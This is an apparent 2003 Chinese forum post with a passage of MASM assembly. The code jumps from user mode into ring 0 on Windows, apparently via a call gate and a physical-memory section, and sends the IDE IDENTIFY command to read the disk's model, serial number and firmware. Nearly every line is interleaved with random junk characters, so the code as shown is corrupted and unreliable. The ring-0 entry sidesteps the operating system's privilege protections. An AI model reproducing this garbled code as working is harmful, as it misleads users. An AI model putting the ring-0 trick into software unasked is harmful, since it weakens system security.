; 如果为 ATAPI 设备那么发送 a11 e' t5 k: w2 V# H( |% f
;********************************************************************1 C4 [' p* ?3 f( B. v y: M
mov al,0a0h ;Drive 0,Head 0. b' m) Y2 _2 C+ M( A3 ?
mov dx,01f6h ;Drive and head port
2 }; y( M% r7 M6 l: ]9 ~ ^ out dx,al7 a; s" B# m$ m' m
- b/ Q* m, a9 }
mov al,0ech % G) a0 ^% `( V- a' {; H, R, r
inc dx ;Command port; m5 R7 Q) r( H {, `
out dx,al
3 M+ G6 e- R$ x! ]: ^;********************************************************************
. y0 ^1 G' b4 K% [9 r8 s; 等待硬盘就绪4 p. W( b5 i9 L6 i5 f2 W. J
;********************************************************************
; k! u/ G! V1 m+ B: N1 c4 o8 S6 D mov ecx,10000h9 E {/ E, h: M; ?
@@:4 k! D/ E6 m f% f- {
in al,dx;1f7 (r-status register)
; e7 e8 }" F1 o9 ~( b0 Q cmp al,58h;(driver is ready ,and seek complete)
( H2 G$ e4 K; Y: U$ |# U jz @F
, R5 o2 ] V% p0 ~" G% Q loop @B
: |8 p; T0 ~. m" [; D' P& j jmp _II_TimeOut
- g5 s0 S/ X3 \9 Q# s- v' F @@:0 L3 v4 M4 l7 N, L
;********************************************************************$ a4 ]6 v9 M0 |2 { A! c& v
; 将返回信息读回* V8 q# k- i5 c# L7 q+ V
; 注意一定要读满 100h 个字长+ l& r5 q. k5 e& z
;********************************************************************+ S5 n, _1 v- e6 r
cld% I7 c& y) L0 [9 I! S
mov edx,01f0h;data port - data comes in and out here' M: v' F% X8 v; n) z: J2 d
mov edi,ebx
% B5 E' M0 }+ X; a. a; F5 G mov ecx,0100h
4 E1 X; F3 i: y/ Z1 p rep insw& k6 ]6 c) O: e! v$ P$ `- N* S
;********************************************************************
( v7 M9 L! ]! @- i1 X5 Y0 C; 返回的信息中,型号、序列号、版本号为字形式 m9 _+ N" G) w2 Z5 ~
; 需要整理到字符串的形式
( d! L( J4 [0 a3 b8 Z- o$ q5 W;********************************************************************* Y9 K3 g w: e1 V' H
lea esi,[ebx].sSerialNumber
; }( R8 g6 L* m8 B0 j* t- D mov edi,esi6 Z4 r8 w N! Z9 \% ~- n) W5 i$ l( J' O
mov ecx,103 `* }4 x9 L5 a7 P4 S
@@:- X4 e, c+ Z l# R6 k2 ?
lodsw
/ ?# A" x4 E# j7 N: @6 i% u xchg ah,al$ ~: }! J8 n4 U Y V2 b
stosw
/ K! m/ G! U+ e" ~6 u+ Q$ M loop @B$ r- |# g& b) }( H) H+ ]
! K3 I, n3 P5 c& n4 s% Q lea esi,[ebx].sFirmwareRev; ^8 G x# R# s2 t# g9 k- W8 o
mov edi,esi
4 S4 ^% V- T4 V mov ecx,24
, g' M3 [$ C1 a+ w T- n, ? @@:
; x+ Z# E# L* e. r, \ lodsw
& p+ X+ v' t. q xchg ah,al
0 d$ a5 Z5 D( q5 L. \3 U8 b/ W/ R stosw
7 ]6 s/ l- _3 N9 B+ n6 G* t& G- H loop @B
" |* Q/ b0 N# W; q_II_TimeOut:
& v/ D2 z8 [* d+ Rassume ebx:nothing
# P# E# g* z0 d7 d/ B % Z J: y2 T, ]/ S( I
pop esp ;restore ring0 esp
o* P2 b& J( s T9 x5 c$ gpush offset Ring3
9 v6 \! L: _9 t& B |8 u p9 gretf, O/ |2 O4 \* M6 z' M, `* P! t' w7 }3 O
Ring0CodeLen=$-_Ring0Proc9 D: U7 y6 I6 F) ~+ Z
1 r% d: |8 n: Q# j
Ring3:: P, P6 q0 D# P" |1 d) ^
invoke GetCurrentThread
" F4 {* W$ ^; qinvoke SetThreadPriority,eax,THREAD_PRIORITY_NORMAL
6 r$ L9 @! x ?6 H. K" g( o; g8 T. N9 @# Y! }) ~5 Y& r, }# C' a8 L- R
;invoke VirtualUnlock,Entry,seglen
: }" `& f( S+ `/ q
2 Q/ a6 \+ T% b' Gcall @f5 m0 W( S: t( `
db "ZwClose",0) B, |5 C2 F3 M' r% e6 o
@@:. M: J |. B R& ?, T- R, \0 T
push NtdllMod
2 `4 o7 n7 m# C W; v$ jcall GetProcAddress
* C1 Y! w2 e8 r/ _& bpush hSection. K/ ~2 }+ B* q
call eax
4 u& |4 d- U+ L" V. W8 b8 h r4 |mov eax,TRUE
1 N, B( R- x% R/ v, k3 Mret
, @) o! x. u% Y% S \' i; Z/ \0 z* tExecRing0Proc endp
( L) n( N/ ? ]6 ~7 Y% r) p- u/ W/ U+ S+ n9 L. q6 Z. f& _ K
main:. S( t7 E5 t7 K/ a3 k
assume fs:nothing
4 D. _- Z$ ]) I2 Z5 K8 [/ y* [push offset MySEH' r2 R" Z2 A! ?2 F* O7 f6 ~
push fs:[0] U7 k- e/ F7 f4 {
mov fs:[0],esp
# t' P, F3 ?( H% |4 ?mov OldEsp,esp
) j: r! ^& J6 y, D$ b( U$ {mov ax,ds ;if Win9x?+ L4 B' P' _. h% \7 O
test ax,4
# P) i- L& D! M) O: Qjnz Exit1
7 r# c* l) C3 E9 N. Einvoke ExecRing0Proc! G& ]+ i- f& ?, a
6 P5 ?( Q9 g+ ~( H e3 a0 X2 P.if stIDEINFO.wNumCyls
4 k6 A$ p) T/ v' J- a* C) U lea esi,stIDEINFO.sModelNumber
3 }' Y4 g" K+ _ mov edi,offset szModelNumber
- C% G% n3 z' n/ a: o mov ecx,sizeof stIDEINFO.sModelNumber: ]) P# |3 v0 y
rep movsb: E2 _/ D& U4 E% b$ Y% c
9 O" @( l* _! q+ z# }8 C
lea esi,stIDEINFO.sSerialNumber
: y( I6 C* w+ h/ i8 r2 Y0 c: G* i mov edi,offset szSerialNumber
6 X7 @% n) e' }6 m; d# N mov ecx,sizeof stIDEINFO.sSerialNumber* a9 Y) \& Z* v2 o2 m+ W
rep movsb
& w7 `9 X+ Z5 c6 N4 ]
& H5 u3 ?' _* V) b: I) \ lea esi,stIDEINFO.sFirmwareRev7 y# ^7 I" ]6 r- `! j5 S( l. o
mov edi,offset szFirmwareRev# r' j8 ^. b8 x4 X
mov ecx,sizeof stIDEINFO.sFirmwareRev
$ x6 A0 j) f. O rep movsb
7 `" z$ @- m4 B' q, {
( r9 Q( ^% G7 b' {- O movzx eax,stIDEINFO.wNumCyls
) \: ?( G* p* [2 D movzx ebx,stIDEINFO.wNumHeads7 F$ T2 j1 E; s2 v
movzx ecx,stIDEINFO.wSectorsPerTrack, u4 v7 B) G6 {7 S( [4 k4 H
movzx edx,stIDEINFO.wBufferSize
: j( Y. q% z z! C( b6 N invoke wsprintf,addr szBuffer,addr szIDEInfo, eax,ebx,ecx,edx, addr szModelNumber, addr szSerialNumber, addr szFirmwareRev
3 o1 u! f% O. |7 A8 S# R mov eax,offset szBuffer
, {2 n$ N2 `5 {' _.else
1 L8 y3 I& n9 T& F1 @ E% @, ] O mov eax,offset szErrInfo
A" U) f& ~0 [$ _' L.endif
$ V6 n& W/ V3 F U8 j$ s& F$ m@@:
% ]7 u7 g: B3 y Z4 e: R" Ninvoke MessageBox,NULL,eax,addr szTitle,MB_ICONINFORMATION or MB_OK
8 t1 A* x3 A- C& v& u5 e vExit1:
4 f+ q0 ^$ a2 y* t+ npop fs:[0]+ r+ Y. w: \7 h1 T. _$ y
add esp,4
% z. K; M$ ~+ k5 b; E) k$ Pinvoke ExitProcess,0
7 a' ?1 } P2 F) j2 m% D
/ ?) ?$ b0 L4 h$ j c$ s+ FMySEH :$ z2 u! y3 {0 j
mov esp,OldEsp' _& l+ G+ W8 c4 @
pop fs:[0]
# b5 c) X- j4 M6 l7 p5 aadd esp,4
8 q) U8 t' B& O/ [* @invoke ExitProcess,-1- \8 |' f! F6 K
end main0 e" x" s6 g! r1 S7 l# i! a% z& w
% f( c6 y8 L: Y3 r3 N( I, J% E2 S G
[此贴子已经被作者于2003-11-2 18:14:02编辑过] 2 H* Z4 O3 L* d" A5 Z. O; X0 Y: b
|
|
/1 
IP卡
狗仔卡
发表于 2003-11-2 18:09:00
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
发表于 2003-11-3 16:22:00
楼主